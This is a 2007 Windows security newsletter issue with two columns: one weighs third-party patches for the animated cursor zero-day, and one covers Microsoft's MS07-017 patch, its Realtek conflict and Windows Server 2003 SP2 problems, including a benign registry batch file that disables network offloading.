Mark Joseph Edwards is a senior contributing editor of Windows IT Pro Magazine and writes the weekly e-mail newsletter Security UPDATE. He’s a network engineer, freelance writer, and the author of Internet Security with Windows NT.
Don't rule out third-party security patches
By Ryan Russell
A new zero-day threat for Windows recently appeared on the Web in the form of animated cursors and other graphical objects that could silently infect your system. This is yet another vulnerability that can compromise your PC if you simply view a Web page or read e-mail — and it even reportedly affects Firefox, as described by ZDNet blogger Ryan Naraine.
Microsoft’s patch didn’t come in time
According to the Microsoft Security Response Center blog, Microsoft was first notified about this vulnerability on Dec. 20, 2006, by a Determina security researcher. Microsoft also says it was made aware that the attack was being used in the wild on Mar. 28 by McAfee. The blog entry goes on to say that Determina is not to blame for leaking the flaw and speculates that it must have been discovered independently.
Microsoft released an emergency patch on Apr. 3, meaning that this exploit was being actively circulated for almost a week, if not longer.
I’m not going to blame Microsoft today for not predicting the future. What do you do when you’re aware that a zero-day attack is being used in the wild, but your vendor doesn’t have a patch. Do you sit back and take it, or do you craft your own mitigation strategy?
Microsoft doesn’t have a monopoly on patches
A third-party giving you a patch for someone else’s software is nothing new. After all, what was a floppy-disk copy-protection crack back in the ’80s but a special kind of binary patch? And, of course, small source patches are the norm in the open-source world.
But, in the recent past, there have been a handful of examples of binary patches to combat security holes in commercial software. I’m sure that if I looked hard, I could find examples of this from many years ago. The fact that people are doing it on a semi-regular basis now is what’s new.
The recent trend was kicked off by a patch that researcher Ilfak Guilfanov released in December 2005 for the WMF (Windows Metafile) vulnerability. As contributing editor Chris Mosby mentioned briefly in his Sept. 28 column, the Zero-day Emergency Response Team (ZERT) was later formed to create a patch for the Microsoft VML (Vector Markup Language) vulnerability. ZERT released a patch for this issue. Determina also has released some zero-day patches.
It turns out that eEye Digital Security wants to get into the game, too. The company released its own patch for the animated cursor vulnerability, as announced in a Mar. 28 advisory.
Such third-party patches are now moot, because Microsoft has released its official patch. For more information, see contributing editor Susan Bradley’s column later in this issue.
However, another zero-day situation like this one is going to happen again at some point in the future, I promise you. It seems likely that a third-party patch will be once again available to you in the future, when no vendor patch is.
Should you use third-party patches?
This all raises the question of whether you should use third-party patches. I personally think you should consider it. No one is forcing these patches on you. Microsoft isn’t going to push them to you via Windows Update. Why would you ever want to remove a possible option from consideration?
Microsoft, of course, cannot recommend third-party patches to you. Is that a surprise? The company doesn’t need any more possible liability, and it doesn’t want you to do anything that might make its patch harder to install once it’s out.
But if you’re following everyone’s security advice, you already have firewall, antivirus, and antispyware tools installed that hook your system just as much as one of these tiny, third-party patches. So I think the idea that you’re creating some significant extra instability by installing an unofficial fix is probably a fallacy.
If you’re doing this on more than a handful of machines, however, you should have some process in place for qualifying new software and patches, whether they’re from Microsoft or anyone else. Also, you will want to remove third-party patches before installing any official Microsoft patch that may come out.
Some of these third-party patches cover platforms that Microsoft no longer supports. I can’t recommend that you stick with unsupported versions of Windows, but you may have your reasons. If you’re stuck with end-of-lifecycle software, these third-party patches start to look more attractive.
It all boils down to risk. Microsoft only took a week (from notification of an exploit being in the wild) to get its Apr. 3 patch out. But maybe your business can’t tolerate an entire week of unsafe Web surfing by your employees. Is a third-party patch a higher or lower risk than your workers inadvertently visiting malicious Web sites?
I want to be clear that I’m not endorsing any of the third-party patches. I haven’t tested them. Frankly, you really need to do some good reverse engineering and have your security people make a proper evaluation of what the impact of any third-party patch might be. We all fairly blindly trust Microsoft’s patches, because we know the world is watching and Microsoft can’t get away with too much funny business without quick detection. I personally extend nearly the same level of trust to ZERT, Determina, and eEye. If there’s anything the security industry likes to do, it’s rip apart one of its own when a mistake is made.
In any case, I like the fact that unofficial patches are available. Don’t let anyone take your options away.
The Perimeter Scan column gives you the facts you need to test your systems to prevent weaknesses. Ryan Russell is quality assurance manager at BigFix Inc., a configuration management company. He moderated the vuln-dev mailing list for three years under the alias “Blue Boar.” He was the lead author of Hack-Proofing Your Network, 2nd Ed., and the technical editor of the Stealing the Network book series.
Patch animated cursors, don't install 2003 SP2
By Susan Bradley
The first Tuesday of two Patch Tuesdays that are happening this month suddenly hit us this week. It’s very important that you install Microsoft’s Apr. 3 patch to correct a serious security risk in Windows’ handling of icons and other images, but there are issues you need to know about.
MS07-017 (925902)
.Ani bug hits all Windows versions (yes, even Vista)
A threat is in the wild that affects everything from Windows 2000 all the way up to Windows Vista. In response, Microsoft released on Apr. 3 an out-of-cycle patch, MS07-017 (925902). This is an unusual patch that requires your immediate attention. (Microsoft’s usual, monthly batch of patches is expected to be released on Apr. 10, the second Tuesday of the month.)
Before you install the MS07-017 patch, be aware that Microsoft found an issue impacting Windows XP and 2003 machines. Knowledge Base article 935448 documents this issue, which prevents Realtek’s HD Audio Control Panel (see Figure 1, below) from running after the patch is installed. If this problem affects you, you’ll see the following error message after you apply the patch:
“Error on reboot: RTHDCPL.EXE Illegal System Relocation. The System DLL user32.dll was relocated in memory. The application will not run properly. The relocation occurred because the DLL C:\Windows\system32\HHCTRL.OCX occupied an address range reserved for Windows system DLLs. The vendor supplying the DLL should be contacted for a new DLL.”
Figure 1: Microsoft found an issue with patch MS07-017 that prevents Realtek’s HD Audio Control Panel (shown above) from running after the patch is installed.
Early reports in a CNET discussion forum indicate that some other software may be impacted as well. Microsoft says the problem results from two of its security updates conflicting. The company has released a hotfix, which appears to correct the problem with Realtek’s app and others. The hotfix is available via KB 935448.
Contributing editor Woody Leonhard was the first to point out to me that new audio drivers, dated Mar. 30, are now available from Realtek’s download page. He feels that installing the updated drivers is preferable to getting the hotfix.
As Robert David Graham points out in an Errata Security blog entry, the conflict gives us a clue as to why it took Microsoft from its first notification of the security hole in December 2006 until now to release the patch. Microsoft found issues such as these while testing, Graham says.
MS07-017 not only patches the “animated cursor” bug, which was first reported to Microsoft three-and-a-half months ago by Determina, but also six other graphics-based vulnerabilities.
If you’re a bit of a technical reader, you’re probably wondering why this patch, entitled “Vulnerabilities in GDI could allow remote code execution,” sounds familiar. It’s because it’s very similar to MS05-002, MS05-053, and another out-of-cycle patch, MS06-001. All were graphics and cursor patches that were released in 2005 and early 2006 to close major security holes.
Earlier this week, there were reports that the Taiwan-based Web site of ASUS, the motherboard manufacturer, was unknowingly hosting an exploit using the then-unpatched .ani hole. SpywareSucks blogger Sandi Hardmeier wrote about this in an Apr. 4 blog entry.
This time, even using Firefox 2 or IE 7 on Vista might not have been enough to protect you, as ZDNet’s George Ou reports. Firefox doesn’t yet take advantage of Vista’s DEP (Data Execution Prevention) mechanism, and by default DEP is not turned on in Vista for IE 7 or most other applications. Microsoft blogger Robert Hensing provides information about the additional security layer you can add to IE under Vista if your Intel or AMD CPU supports hardware DEP.
Bottom line, the graphics bugs are nasty on 2000 and XP, and only in Vista are you moderately protected. Thus, if you’re like many and are not using Vista, be aware of the quirks I describe above, but still apply patch MS07-017 immediately.
Windows 2003 SP2 is still causing issues
As I reported in my Mar. 22 column, I’m still seeing issues with the installation of Windows 2003 Service Pack 2. As a result, I’m waiting before installing SP2 on my production systems, and I recommend that you hold off, too.
Most of the issues are being reported on Small Business Server 2003 and ISA Server 2004, Microsoft’s firewall product. The hardest issues to resolve are related to certain chipsets of network cards, typically the Broadcom chipset. Here’s an overview of this and some other problems:
• VPN, network and connectivity issues. You may find issues with your ISA 2004 firewall, Outlook connectivity, Remote Desktop, or VPN (Virtual Private Network). If you have Broadcom NICs (network interface cards), first make sure you have the latest drivers installed. Then, use the Registry to disable RSS (Receive Side Scaling) and Task Offloading, as discussed in the SBS blog and the ISA Server blog.
• Help and Support Service missing. Seemingly the largest issue, and one that’s easily fixed, is that the Help and Support Service appears to be missing. The instructions to reinstall this service are discussed on the SBS blog for that platform.
• Issues caused by uninstallation of SP2. Removing SP2 alters scheduled tasks, so you must reenter their passwords. Also, unless you have Windows 2003 R2 or SBS 2003 R2, removing SP2 causes problems with the rollback of MMC 2.0. To resolve this, review the known issues in the release notes and remove the files from the %APPDATA%\Microsoft\MMC folder.
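As an added illustration of the Registry workaround in the first bullet above (this is not the SBS or ISA Server blog’s own script), the batch file below backs up the TCP/IP parameters key, then turns off RSS and task offloading and shows the result so you can verify it before rebooting. The value names EnableRSS, EnableTCPChimney, and DisableTaskOffload come from Microsoft’s Scalable Networking Pack documentation rather than from this column; TCP Chimney is included because it is the pack’s third offload feature, one step beyond what the bullet lists.

```batch
@echo off
rem Added example, not from the column: turn off Receive Side Scaling and
rem task offloading on Windows Server 2003 SP2 / SBS 2003 through the Registry.
rem Value names (EnableRSS, EnableTCPChimney, DisableTaskOffload) are taken
rem from Microsoft's Scalable Networking Pack documentation; confirm them
rem against the SBS and ISA Server blog guidance for your build before use.
setlocal
set KEY=HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
set BACKUP=%TEMP%\tcpip-params-backup.reg

rem 1. Back up the key first so the change can be reverted with:
rem       reg import "%TEMP%\tcpip-params-backup.reg"
if exist "%BACKUP%" del "%BACKUP%"
reg export "%KEY%" "%BACKUP%"
if errorlevel 1 (
    echo Backup of %KEY% failed; no changes made.
    exit /b 1
)

rem 2. Disable RSS and TCP Chimney (both Scalable Networking Pack features)
reg add "%KEY%" /v EnableRSS /t REG_DWORD /d 0 /f
reg add "%KEY%" /v EnableTCPChimney /t REG_DWORD /d 0 /f

rem 3. Disable task offloading (checksum/segmentation work pushed to the NIC)
reg add "%KEY%" /v DisableTaskOffload /t REG_DWORD /d 1 /f

rem 4. Read the values back so the change can be checked before the reboot
reg query "%KEY%" /v EnableRSS
reg query "%KEY%" /v EnableTCPChimney
reg query "%KEY%" /v DisableTaskOffload

echo Reboot the server for the new settings to take effect.
endlocal
```

Run it from an elevated command prompt on the affected server; update the Broadcom NIC drivers first, as the bullet advises, and only then apply the Registry change.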
The Patch Watch column reveals problems with patches for Windows and major Windows applications. Susan Bradley recently received a MVP (Most Valuable Professional) award from Microsoft for her knowledge in the areas of Small Business Server and network security. She’s also a partner in a California CPA firm.
Publisher: AskWoody LLC (woody@askwoody.com); editor: Tracey Capen (editor@askwoody.com).